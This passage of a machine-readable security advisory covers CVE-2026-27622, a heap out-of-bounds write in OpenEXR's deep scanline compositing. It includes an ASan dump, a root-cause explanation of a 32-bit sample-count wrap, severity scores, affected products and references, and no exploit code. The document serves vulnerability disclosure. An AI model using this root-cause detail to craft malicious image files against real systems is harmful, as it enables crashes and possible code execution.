00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==175024==ABORTING\n```\n\n## Root cause analysis\n\nIn `CompositeDeepScanLine::readPixels`:\n\n1. Per-pixel totals are accumulated in `vector total_sizes`.\n2. For attacker-controlled large counts across many parts, `total_sizes[ptr]` wraps modulo `2^32`.\n3. `overall_sample_count` is then derived from wrapped totals and used in `samples[channel].resize(overall_sample_count)`.\n4. Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (`generic_unpack_deep_pointers`) overrun the undersized composite sample buffer.\n\n\nAllocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.\n\n## Impact\n\nHeap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-cr4v-6jm6-4963.json?alt=media" }, { "category": "description", "text": "No description is available for this CVE.", "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27622" }, { "category": "description", "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.", "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27622" }, { "category": "other", "text": "0.00013", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "8.4", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5757224", "CSAFPID-5757225", "CSAFPID-5757226", "CSAFPID-3021051", "CSAFPID-3021052", "CSAFPID-3021053", "CSAFPID-5759241", "CSAFPID-5759242", "CSAFPID-5759243", "CSAFPID-5759244", "CSAFPID-5759245", "CSAFPID-5759246", "CSAFPID-5759247", "CSAFPID-5759248", "CSAFPID-5759249", "CSAFPID-5759250", "CSAFPID-5759251", "CSAFPID-5759252", "CSAFPID-5759253", "CSAFPID-5759254", "CSAFPID-1439315", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1439321", "CSAFPID-2858634", "CSAFPID-3020246", "CSAFPID-3020248", "CSAFPID-3020250", "CSAFPID-5759811", "CSAFPID-5759812", "CSAFPID-1408023", "CSAFPID-1408024", "CSAFPID-5763878", "CSAFPID-5763879", "CSAFPID-5763880" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-cr4v-6jm6-4963" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-cr4v-6jm6-4963" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27622" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27622" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27622.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27622" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-cr4v-6jm6-4963.json?alt=media" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/security/cve/CVE-2026-27622" }, { "category": "external", "summary": "Source raw - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27622.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-27622" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-cr4v-6jm6-4963" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27622" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "CSAFPID-1439315", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1439321", "CSAFPID-2858634", "CSAFPID-3020246", "CSAFPID-3020248", "CSAFPID-3020250", "CSAFPID-5759811", "CSAFPID-5759812" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-1408023", "CSAFPID-1408024", "CSAFPID-1439315", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1439321", "CSAFPID-2858634", "CSAFPID-3020246", "CSAFPID-3020248", "CSAFPID-3020250", "CSAFPID-3021051", "CSAFPID-3021052", "CSAFPID-3021053", "CSAFPID-5757224", "CSAFPID-5757225", "CSAFPID-5757226", "CSAFPID-5759241", "CSAFPID-5759242", "CSAFPID-5759243", "CSAFPID-5759244", "CSAFPID-5759245", "CSAFPID-5759246", "CSAFPID-5759247", "CSAFPID-5759248", "CSAFPID-5759249", "CSAFPID-5759250", "CSAFPID-5759251", "CSAFPID-5759252", "CSAFPID-5759253", "CSAFPID-5759254", "CSAFPID-5759811", "CSAFPID-5759812", "CSAFPID-5763878", "CSAFPID-5763879", "CSAFPID-5763880" ] } ], "title": "CVE-2026-27622" } ] }